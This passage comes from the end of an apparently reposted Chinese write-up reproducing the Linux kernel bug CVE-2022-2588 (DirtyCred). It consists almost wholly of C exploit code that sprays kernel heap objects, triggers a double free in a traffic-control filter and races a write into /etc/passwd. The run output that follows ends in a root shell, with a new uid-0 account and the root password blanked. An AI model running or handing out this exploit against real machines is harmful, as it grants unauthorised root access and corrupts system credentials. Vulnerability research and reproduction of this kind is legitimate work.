// 11. start 2 threads: Thread 1-take up write lock; Thread 2-write evil data
printf("[11] start 2 threads compete to write\\n");
pthread_t pid, pid2;
pthread_create(&pid, NULL, slow_write, NULL);
pthread_create(&pid2, NULL, write_cmd, NULL);
while (!run_spray) {}
// 12. spray privileged `file` object
close(overlap_a); // ??????????? why release twice ???????????
close(overlap_b);
usleep(1000 * 100);
int spray_num = 4096;
write(pipe_file_spray[0][1], &spray_num, sizeof(int));
if (read(pipe_file_spray[1][0], &msg, 2) != 2)
err(1, "[-] read from file spray");
overlapped = true;
}
}
if (overlapped)
break;
}
// 13. finish exploitation
sleep(3);
while (run_write) { sleep(1); }
printf("[13] check whether we overwrite the privileged file\\n");
if (!overlapped) {
printf("[-] no overlap found :(...\\n");
write(pipe_main[1], "\\xff", 1);
}
else {
int xx = open(target, 0);
char buf[0x100] = {};
// check if user (hi) in the passwd
read(xx, buf, 0x30);
if (!strncmp(buf, "hi", 2))
write(pipe_main[1], "\\x00", 1);
else {
printf("[-] not successful : %s\\n", buf);
write(pipe_main[1], "\\xff", 1);
}
}
while (1) { sleep(1000); }
}
int run_exp() {
// 0. initialize pipe as notifier
if (pipe(pipe_parent) == -1)
err(1, "[-] fail to create pipes\\n");
if (pipe(pipe_child) == -1)
err(1, "[-] fail to create pipes\\n");
if (pipe(pipe_defrag) == -1)
err(1, "[-] fail to create pipes\\n");
if (pipe(pipe_file_spray[0]) == -1) // begin spray file
err(1, "[-] fail to create pipes\\n");
if (pipe(pipe_file_spray[1]) == -1) // end spray file
err(1, "[-] fail to create pipes\\n");
cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);
if (fork() == 0) {
// 12. Thread 3 - spray 4096*2 priviledged `file` objects to replace unprivileged `file` (wait pipe_file_spray[0])
adjust_rlimit();
int spray_num = 0;
if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int)) // use pipe_file_spray to notify
err(1, "[-] read file spray");
printf("[12] got cmd, start spraying 4096*2 `file` by opening %s\\n", target);
spray_num = 4096;
if (fork() == 0) { // spray 4096 `file` (parent-process)
for (int i = 0; i < spray_num; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
while (1) { sleep(10000); }
}
// spray 4096 `file` (sub-process)
for (int i = 0; i < spray_num; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
printf("[*] spray done\\n");
write(pipe_file_spray[1][1], "OK", 2); // write pipe_file_spray[1] —— finish spray `file`
while (1) { sleep(10000); }
exit(0);
}
// 0. preprocess & start main exploit
if (fork() == 0) {
pin_on_cpu(0);
pre_exploit(); // set up process memory / working dir / namespace
exploit(); // main exploit
}
else
{
sleep(2);
if (fork() == 0)
{
// 1. defragmentation —— spray 10000 `file` to exhaust all file slabs for cross cache - all cores
adjust_rlimit();
printf("[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache\\n");
for (int i = 0; i < 10000; i++) {
pin_on_cpu(i % cpu_cores);
open(target, 0);
}
if (write(pipe_defrag[1], "OK", 2) != 2)
err(1, "[-] failed write defrag");
while (1) { sleep(1000); }
}
else
{
// 2. spray thread - core 0 spray kmalloc-192 & kmalloc-256
setup_namespace();
pin_on_cpu(0);
int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
assert(sprayfd != -1);
add_qdisc(sprayfd);
// 2-1. prepare payload
char msg[0x10] = {};
char payload[256] = {};
memset(payload + 0x10, 'A', 256 - 0x10);
if (read(pipe_defrag[0], msg, 2) != 2)
err(1, "[-] failed read defrag");
// if the exploit keeps failing, please tune the middle and end
int middle = 38; // 38
int end = middle + 40; // 40
// 2-2. spray (38+3)*32 filters in kmalloc-192 & kmalloc-256
printf("[2] spray (38+3)*32 kmalloc-192 & kmalloc-256\\n");
for (int i = 0; i < middle; i++)
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\\n");
// 4. spray more filters in kmalloc-192 & kmalloc-256
if (read(pipe_parent[0], msg, 2) != 2)
err(1, "[-] read from parent");
// add_tc_basic(sprayfd, middle+2, payload, 129, 32);
// prepare another part for cross cache
printf("[4] spray kmalloc-192 & kmalloc-256\\n");
for (int i = middle + 2; i < end; i++)
add_tc_basic(sprayfd, i + 1, payload, 193, 32);
// 5. free (end-24)*32 kmalloc-192 & kmalloc-256
printf("[5] free (end-24)*32 kmalloc-192 & kmalloc-256\\n");
for (int i = 1; i < end - 24; i++) {
// prevent double free of 192 and being reclaimed by others
if (i == middle || i == middle + 1)
continue;
delete_tc_basic(sprayfd, i + 1);
}
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\\n");
// 7. free (end-middle+1)*32 kmalloc-192 & kmalloc-256
if (read(pipe_parent[0], msg, 2) != 2)
err(1, "[-] read from parent");
// if (cpu_cores == 1) sleep(1);
printf("[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256\\n");
delete_tc_basic(sprayfd, middle + 2);
delete_tc_basic(sprayfd, middle + 3);
delete_tc_basic(sprayfd, 1);
for (int i = middle + 2; i < end; i++)
delete_tc_basic(sprayfd, i + 1);
//getchar();
if (write(pipe_child[1], "OK", 2) != 2)
err(1, "[-] write to parent\\n");
while (1) { sleep(1000); }
}
}
}
int main(int argc, char** argv) {
global = (char*)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_SHARED | MAP_ANON, -1, 0);
memset(global, 0, 0x2000);
self_path = global;
snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
printf("[*] self path %s\\n", self_path);
// prepare write data —— evil data + existing data in /etc/passwd
printf("[*] prepare evil data\\n");
int fd = open(target, 0);
content = (char*)(global + 0x100);
strcpy(content, overwrite);
read(fd, content + strlen(overwrite), 0x1000);
close(fd);
// run_exp() in sub-process
assert(pipe(pipe_main) == 0);
if (fork() == 0) {
run_exp(); // main exploit
while (1) { sleep(10000); }
}
// judge if succeed
char data;
read(pipe_main[0], &data, 1);
if (data == 0)
printf("[+] succeed\\n");
else
printf("[-] failed\\n");
}
$ ./exploit
[*] self path /home/hi/./exploit
[*] prepare evil data
Old limits -> soft limit= 14096 hard limit= 14096
[*] starting exploit, num of cores: 4
[1] defragmentation - spray 10000 `file` to exhaust all file slabs for cross cache
[2] spray (38+3)*32 kmalloc-192 & kmalloc-256
[3] allocate the vulnerable filter
[4] spray kmalloc-192 & kmalloc-256
[5] free (end-24)*32 kmalloc-192 & kmalloc-256
[6] 1st freed the filter object
[7] free (end-middle+1)*32 kmalloc-192 & kmalloc-256
[8] spray 4000 uprivileged `file`
[9] 2nd free the filter object
pause after 2nd free
[10] spraying 5000 unprivileged `file`
[10-1] found overlapped file, id : 22, 1930
[11] start 2 threads compete to write
[11-1] start slow write
[11-2] write evil data after the slow write
[12] got cmd, start spraying 4096*2 `file` by opening /etc/passwd
[*] spray done
[*] write done, spent 9.352879 s
[13] check whether we overwrite the privileged file
[+] succeed
$ su hi
Password:
# id
uid=0(hi) gid=0(root) groups=0(root)
# cat /etc/passwd
hi:x:0:0:root:/:/bin/sh
root::0:0:root:/root:/bin/bash
看雪ID:Arahat0
https://bbs.kanxue.com/user-home-964693.htm
# 往期推荐
球分享
球点赞
球在看
点击阅读原文查看更多
原文始发于微信公众号(看雪学苑):CVE-2022-2588 Dirty Cred漏洞分析与复现